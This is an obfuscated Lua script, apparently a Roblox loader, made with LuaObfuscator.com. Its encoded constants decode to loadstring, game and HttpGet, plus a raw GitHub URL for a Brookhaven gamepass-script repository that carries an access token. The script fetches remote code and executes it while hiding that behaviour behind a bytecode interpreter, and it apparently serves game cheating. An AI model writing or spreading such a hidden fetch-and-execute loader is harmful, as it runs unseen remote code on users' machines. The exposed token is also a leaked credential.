--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v94=v5(v82,v19);v19=nil;return v94;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/(((882 -(282 + 595)) -3)^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -((2494 -(1523 + 114)) + 74))) ;else local v84=568 -(367 + 201) ;local v85;while true do if (v84==0) then v85=(929 -(214 + 713))^(v32-(1 + 0 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or 0 ;end end end end local function v21() local v34=(117 -(32 + 85)) -0 ;local v35;while true do if (v34==(1066 -(68 + 997))) then return v35;end if (v34==((1245 + 25) -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + 1 ;v34=4 -3 ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + 1 + 1 );v18=v18 + (959 -(892 + 65)) ;return (v37 * (610 -354)) + v36 ;end local function v23() local v38=0 -(952 -(802 + 150)) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * 16777216) + (v41 * (65886 -(87 + 263))) + (v40 * (436 -(67 + 113))) + v39 ;end if (v38==(0 + 0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 3 + 1 ;v38=(7 -4) -(3 -1) ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,998 -(915 + 82) ,56 -36 ) * ((2 + 0)^(41 -9))) + v43 ;local v47=v20(v44,1208 -(1069 + 118) ,70 -39 );local v48=((v20(v44,69 -37 )==(1 + 0 + 0)) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==(0 -(772 -(201 + 571)))) then return v48 * ((1156 -(116 + 1022)) -(10 + 8)) ;else local v95=0 -0 ;while true do if (v95==((1840 -1398) -(245 + 171 + 26))) then v47=1;v45=0 -0 ;break;end end end elseif (v47==2047) then return ((v46==(0 + 0)) and (v48 * ((1 -0)/((1598 -1160) -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end local function v25(v49) local v50;if  not v49 then local v86=(0 + 0) -0 ;while true do if (v86==0) then v49=v23();if (v49==(859 -(814 + 45))) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v66=1 + 0 , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do if ((700 -(208 + 490))==v52) then v57[ #"asd"]=(function() return v21();end)();for v96= #">",v23() do local v97=(function() return v21();end)();if (v20(v97, #"|", #"~")~=0) then else local v103=(function() return 0;end)();local v104=(function() return;end)();local v105=(function() return;end)();local v106=(function() return;end)();while true do if (v103==2) then if (v20(v105, #"]", #",")== #">") then v106[2]=(function() return v59[v106[1 + 1 ]];end)();end if (v20(v105,2,2)== #"/") then v106[ #"19("]=(function() return v59[v106[ #"xxx"]];end)();end v103=(function() return 3;end)();end if (v103==(1 + 0)) then local v111=(function() return 0;end)();while true do if (v111==1) then v103=(function() return 838 -(660 + 176) ;end)();break;end if (v111~=(0 + 0)) then else v106=(function() return {v22(),v22(),nil,nil};end)();if (v104==(202 -(14 + 188))) then local v162=(function() return 0;end)();local v163=(function() return;end)();while true do if (v162~=(675 -(534 + 141))) then else v163=(function() return 0 + 0 ;end)();while true do if (0==v163) then v106[ #"xnx"]=(function() return v22();end)();v106[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v104== #"}") then v106[ #"19("]=(function() return v23();end)();elseif (v104==2) then v106[ #"-19"]=(function() return v23() -(2^16) ;end)();elseif (v104== #"xxx") then local v175=(function() return 0 + 0 ;end)();local v176=(function() return;end)();while true do if (v175~=(0 + 0)) then else v176=(function() return 0;end)();while true do if (v176~=(0 -0)) then else v106[ #"xnx"]=(function() return v23() -((2 -0)^(44 -28)) ;end)();v106[ #"0836"]=(function() return v22();end)();break;end end break;end end end v111=(function() return 1 + 0 ;end)();end end end if (v103~=0) then else v104=(function() return v20(v97,2 + 0 , #"91(");end)();v105=(function() return v20(v97, #"?id=",402 -(115 + 281) );end)();v103=(function() return 2 -1 ;end)();end if (v103==(3 + 0)) then if (v20(v105, #"gha", #"-19")~= #"|") then else v106[ #".com"]=(function() return v59[v106[ #"?id="]];end)();end v54[v96]=(function() return v106;end)();break;end end end end for v98= #"|",v23() do v55,v98,v28=(function() return v53(v55,v98,v28);end)();end return v57;end if (v52==(2 -1)) then local v91=(function() return 0;end)();while true do if (v91==(0 -0)) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v91=(function() return 868 -(550 + 317) ;end)();end if ((1 -0)~=v91) then else v59=(function() return {};end)();for v107= #"~",v58 do local v108=(function() return 0 -0 ;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v108~=0) then else local v113=(function() return 0 -0 ;end)();while true do if (v113==(285 -(134 + 151))) then local v157=(function() return 1665 -(970 + 695) ;end)();while true do if (v157~=(0 -0)) then else v109=(function() return v21();end)();v110=(function() return nil;end)();v157=(function() return 1;end)();end if (1==v157) then v113=(function() return 1991 -(582 + 1408) ;end)();break;end end end if (v113==(3 -2)) then v108=(function() return 1 -0 ;end)();break;end end end if ((3 -2)==v108) then if (v109== #".") then v110=(function() return v21()~=(1824 -(1195 + 629)) ;end)();elseif (v109==(2 -0)) then v110=(function() return v24();end)();elseif (v109~= #"asd") then else v110=(function() return v25();end)();end v59[v107]=(function() return v110;end)();break;end end end v91=(function() return 243 -(187 + 54) ;end)();end if (v91==2) then v52=(function() return 782 -(162 + 618) ;end)();break;end end end if (v52==(0 + 0)) then local v92=(function() return 0;end)();local v93=(function() return;end)();while true do if (v92==0) then v93=(function() return 0 + 0 ;end)();while true do if (v93~=(0 -0)) then else v53=(function() return function(v152,v153,v154) local v155=(function() return 0 -0 ;end)();local v156=(function() return;end)();while true do if (0~=v155) then else v156=(function() return 0;end)();while true do if (v156==0) then local v171=(function() return 0;end)();while true do if (v171~=(0 + 0)) then else v152[v153-#"!" ]=(function() return v154();end)();return v152,v153,v154;end end end end break;end end end;end)();v54=(function() return {};end)();v93=(function() return 1637 -(1373 + 263) ;end)();end if (v93~=(1002 -(451 + 549))) then else v52=(function() return 1;end)();break;end if ((1 + 0)==v93) then v55=(function() return {};end)();v56=(function() return {};end)();v93=(function() return 2;end)();end end break;end end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[2 -0 ];local v65=v60[6 -3 ];return function(...) local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1 -0 ;local v73= -(1385 -(746 + 638));local v74={};local v75={...};local v76=v12("#",...) -(1 -0) ;local v77={};local v78={};for v87=(1471 -(369 + 761)) -(218 + 123) ,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 + 0 ];else v78[v87]=v75[v87 + (1 -(0 + 0)) ];end end local v79=(v76-v70) + (1582 -(1535 + 46)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 + 0 ];if (v81<=(1264 -(1043 + 214))) then if ((630<2127) and (v81<=(3 + 0))) then if (v81<=(1 + (0 -0))) then if (v81>(0 -0)) then v78[v80[582 -(361 + 219) ]]();else local v115=v80[562 -((579 -273) + 254) ];local v116=v78[v80[1 + 2 ]];v78[v115 + (239 -(64 + 174)) + 0 ]=v116;v78[v115]=v116[v80[417 -(15 + 398) ]];end elseif ((v81>((1 + 2) -1)) or (1938==2514)) then local v120=(2172 -705) -(899 + 568) ;local v121;local v122;local v123;local v124;while true do if (v120==(2 + 0)) then for v164=v121,v73 do v124=v124 + (3 -2) ;v78[v164]=v122[v124];end break;end if (v120==(1 + 0)) then v73=(v123 + v121) -(2 -1) ;v124=603 -(268 + 335) ;v120=292 -(60 + 230) ;end if (v120==(572 -(426 + 146))) then v121=v80[1 + 1 ];v122,v123=v71(v78[v121](v13(v78,v121 + (1457 -(282 + (1510 -(144 + 192)))) ,v80[814 -((785 -(42 + 174)) + 242) ])));v120=2 -1 ;end end else v78[v80[1 + 1 ]]();end elseif ((4055==4055) and (v81<=(3 + 2 + 0))) then if (v81>(1028 -(706 + 318))) then local v125=0 -0 ;local v126;local v127;local v128;local v129;while true do if (v125==(1251 -(721 + 530))) then v126=v80[1273 -(945 + 326) ];v127,v128=v71(v78[v126](v13(v78,v126 + (2 -(1 + 0)) ,v80[3 + 0 + 0 ])));v125=701 -(271 + 429) ;end if ((4255>=55) and (v125==(2 + (1504 -(363 + 1141))))) then for v167=v126,v73 do v129=v129 + 1 ;v78[v167]=v127[v129];end break;end if ((2999>1156) and (v125==((3081 -(1183 + 397)) -(1408 + 92)))) then v73=(v128 + v126) -(1087 -((1403 -942) + 625)) ;v129=0;v125=1 + 0 + 1 + 0 ;end end else v78[v80[1290 -(993 + 295) ]]=v62[v80[1 + 2 ]];end elseif (v81==(1177 -(418 + 753))) then v78[v80[1 + 1 ]]=v80[3 + 0 ];else v78[v80[1 + 1 ]]=v62[v80[1 + 2 ]];end elseif (v81<=(3 + 8)) then if ((2350>1155) and (v81<=(538 -(406 + 123)))) then if ((4149<=4445) and (v81>(1777 -(1749 + 20)))) then do return;end else v78[v80[(1976 -(1913 + 62)) + 1 ]]={};end elseif (v81>(6 + 4)) then local v137=v80[4 -2 ];v78[v137]=v78[v137](v13(v78,v137 + (1323 -(1249 + 73)) ,v73));else do return;end end elseif ((4029<=4853) and ((v81<=(5 + 8)) or (1818==85))) then if (v81>(1157 -(466 + 679))) then v78[v80[4 -2 ]]={};else local v140=v80[(4 + 1) -3 ];local v141=v78[v80[1903 -(106 + 1794) ]];v78[v140 + 1 + 0 ]=v141;v78[v140]=v141[v80[2 + 2 ]];end elseif (v81==(4 + 10)) then v78[v80[5 -3 ]]=v80[7 -4 ];else local v147=114 -(4 + 110) ;local v148;while true do if (v147==(584 -((150 -93) + 527))) then v148=v80[1429 -(41 + 1386) ];v78[v148]=v78[v148](v13(v78,v148 + (104 -(17 + 86)) ,v73));break;end end end v72=v72 + (732 -(476 + 255)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403BA3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F53724461726B3Q322F5343524950542D44452D544F444F532D47414D4550412Q532D444F2D42522Q4F4B484156454E2F726566732F68656164732F6D61696E2F4C6973746125323064652532307175656D2532302543332541392532307065726D697469646F3F746F6B656E3D4748534154306Q41433648584134414D552Q43513342534D49454649474A4F5A34364E36555100094Q000D7Q001204000100013Q001204000200023Q00202Q00020002000300120E000400044Q0003000200044Q000B00013Q00022Q00010001000100012Q00093Q00017Q00",v9(),...);
